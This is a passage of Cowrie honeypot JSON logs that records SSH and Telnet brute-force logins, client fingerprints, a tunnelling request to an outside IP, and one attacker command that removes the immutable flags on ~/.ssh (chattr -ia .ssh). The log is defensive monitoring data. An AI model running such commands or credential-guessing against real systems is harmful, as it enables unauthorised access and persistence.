.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: aae6b9604f6f3356543709a376d7f657","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.332468Z","src_ip":"212.227.235.229","session":"347069589079"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43726,"dst_ip":"1.2.3.4","dst_port":22,"session":"008b4d82287e","protocol":"ssh","message":"New connection: 212.227.235.229:43726 (1.2.3.4:22) [session: 008b4d82287e]","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.356257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2","message":"Remote SSH version: SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.357331Z","src_ip":"212.227.235.229","session":"008b4d82287e"}
{"eventid":"cowrie.client.kex","hassh":"aae6b9604f6f3356543709a376d7f657","hasshAlgorithms":"sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["sntrup761x25519-sha512@openssh.com","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: aae6b9604f6f3356543709a376d7f657","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.433179Z","src_ip":"212.227.235.229","session":"008b4d82287e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.705587Z","src_ip":"212.227.235.229","session":"347069589079"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberryraspberry993311","message":"login attempt [pi/raspberryraspberry993311] failed","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.829744Z","src_ip":"212.227.235.229","session":"008b4d82287e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:37:57.774780Z","src_ip":"212.227.235.229","session":"347069589079"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:37:57.893699Z","src_ip":"212.227.235.229","session":"008b4d82287e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40322,"dst_ip":"1.2.3.4","dst_port":23,"session":"037f4046c186","protocol":"telnet","message":"New connection: 212.227.125.160:40322 (1.2.3.4:23) [session: 037f4046c186]","sensor":"my-vps","timestamp":"2025-09-09T09:40:26.337871Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:40:26.425948Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:40:26.501129Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T09:40:26.503958Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T09:40:26.506327Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54048,"dst_ip":"1.2.3.4","dst_port":22,"session":"3696cfd9edd1","protocol":"ssh","message":"New connection: 217.72.205.35:54048 (1.2.3.4:22) [session: 3696cfd9edd1]","sensor":"my-vps","timestamp":"2025-09-09T09:42:17.351552Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:42:17.358464Z","src_ip":"217.72.205.35","session":"3696cfd9edd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17061,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0afe06e3d0f","protocol":"ssh","message":"New connection: 212.227.235.229:17061 (1.2.3.4:22) [session: d0afe06e3d0f]","sensor":"my-vps","timestamp":"2025-09-09T09:43:22.623209Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:43:22.629148Z","src_ip":"212.227.235.229","session":"d0afe06e3d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17470,"dst_ip":"1.2.3.4","dst_port":22,"session":"e688586a9bc4","protocol":"ssh","message":"New connection: 212.227.235.229:17470 (1.2.3.4:22) [session: e688586a9bc4]","sensor":"my-vps","timestamp":"2025-09-09T09:43:22.772993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:43:22.774729Z","src_ip":"212.227.235.229","session":"e688586a9bc4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T09:43:22.933704Z","src_ip":"212.227.235.229","session":"e688586a9bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:43:23.429004Z","src_ip":"212.227.235.229","session":"e688586a9bc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T09:43:23.592244Z","session":"e688586a9bc4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:43:26.506293Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.session.closed","duration":180.17538619041443,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:43:26.512815Z","src_ip":"212.227.125.160","session":"037f4046c186"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36690,"dst_ip":"1.2.3.4","dst_port":23,"session":"df504b669ca0","protocol":"telnet","message":"New connection: 212.227.235.229:36690 (1.2.3.4:23) [session: df504b669ca0]","sensor":"my-vps","timestamp":"2025-09-09T09:43:31.330816Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:43:31.555194Z","src_ip":"212.227.235.229","session":"df504b669ca0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:43:31.592672Z","src_ip":"212.227.235.229","session":"df504b669ca0"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:44:32.780047Z","src_ip":"212.227.235.229","session":"e688586a9bc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41002,"dst_ip":"1.2.3.4","dst_port":22,"session":"813c3c098c05","protocol":"ssh","message":"New connection: 212.227.125.160:41002 (1.2.3.4:22) [session: 813c3c098c05]","sensor":"my-vps","timestamp":"2025-09-09T09:45:06.713947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:45:06.721171Z","src_ip":"212.227.125.160","session":"813c3c098c05"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T09:45:06.785009Z","src_ip":"212.227.125.160","session":"813c3c098c05"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"p@ssw0rd","message":"login attempt [loginuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T09:45:06.992676Z","src_ip":"212.227.125.160","session":"813c3c098c05"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:45:08.073200Z","src_ip":"212.227.125.160","session":"813c3c098c05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41508,"dst_ip":"1.2.3.4","dst_port":23,"session":"31d1279df1f4","protocol":"telnet","message":"New connection: 212.227.125.160:41508 (1.2.3.4:23) [session: 31d1279df1f4]","sensor":"my-vps","timestamp":"2025-09-09T09:45:26.654379Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:45:26.741963Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:45:26.830812Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T09:45:26.833758Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T09:45:26.835798Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":39488,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f01377e0a30","protocol":"ssh","message":"New connection: 139.19.117.131:39488 (1.2.3.4:22) [session: 9f01377e0a30]","sensor":"my-vps","timestamp":"2025-09-09T09:46:26.801110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:46:26.806112Z","src_ip":"139.19.117.131","session":"9f01377e0a30"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T09:46:26.824444Z","src_ip":"139.19.117.131","session":"9f01377e0a30"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPHzdNlwPXB6eFWisaAjjmNgHrmZWlAuNAg6eenQIDzX","type":"ssh-ed25519","message":"public key attempt for user admin of type ssh-ed25519 with fingerprint 08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","sensor":"my-vps","timestamp":"2025-09-09T09:46:26.877721Z","src_ip":"139.19.117.131","session":"9f01377e0a30"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPHzdNlwPXB6eFWisaAjjmNgHrmZWlAuNAg6eenQIDzX","type":"ssh-ed25519","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T09:46:26.878785Z","src_ip":"139.19.117.131","session":"9f01377e0a30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:46:31.610262Z","src_ip":"212.227.235.229","session":"df504b669ca0"}
{"eventid":"cowrie.session.closed","duration":180.2915961742401,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:46:31.621655Z","src_ip":"212.227.235.229","session":"df504b669ca0"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:46:36.806122Z","src_ip":"139.19.117.131","session":"9f01377e0a30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50022,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb6a9d9649fb","protocol":"telnet","message":"New connection: 212.227.235.229:50022 (1.2.3.4:23) [session: bb6a9d9649fb]","sensor":"my-vps","timestamp":"2025-09-09T09:47:30.712461Z"}
{"eventid":"cowrie.session.closed","duration":31.3162100315094,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:48:02.028515Z","src_ip":"212.227.235.229","session":"bb6a9d9649fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:48:26.846516Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.session.closed","duration":180.19853329658508,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:48:26.852515Z","src_ip":"212.227.125.160","session":"31d1279df1f4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49662,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e06f495350e","protocol":"ssh","message":"New connection: 217.72.205.35:49662 (1.2.3.4:22) [session: 0e06f495350e]","sensor":"my-vps","timestamp":"2025-09-09T09:48:44.108921Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:48:44.114420Z","src_ip":"217.72.205.35","session":"0e06f495350e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49866,"dst_ip":"1.2.3.4","dst_port":22,"session":"19863da8522c","protocol":"ssh","message":"New connection: 212.227.235.229:49866 (1.2.3.4:22) [session: 19863da8522c]","sensor":"my-vps","timestamp":"2025-09-09T09:49:53.483322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:49:53.489642Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:49:53.739806Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123..","message":"login attempt [root/qwe123..] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:49:54.772806Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:49:55.312091Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:49:55.314604Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:49:55.317239Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:49:55.571568Z","src_ip":"212.227.235.229","session":"19863da8522c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42464,"dst_ip":"1.2.3.4","dst_port":22,"session":"81548d7fcf5b","protocol":"ssh","message":"New connection: 212.227.235.229:42464 (1.2.3.4:22) [session: 81548d7fcf5b]","sensor":"my-vps","timestamp":"2025-09-09T09:50:26.415589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:50:26.421733Z","src_ip":"212.227.235.229","session":"81548d7fcf5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:50:26.682082Z","src_ip":"212.227.235.229","session":"81548d7fcf5b"}
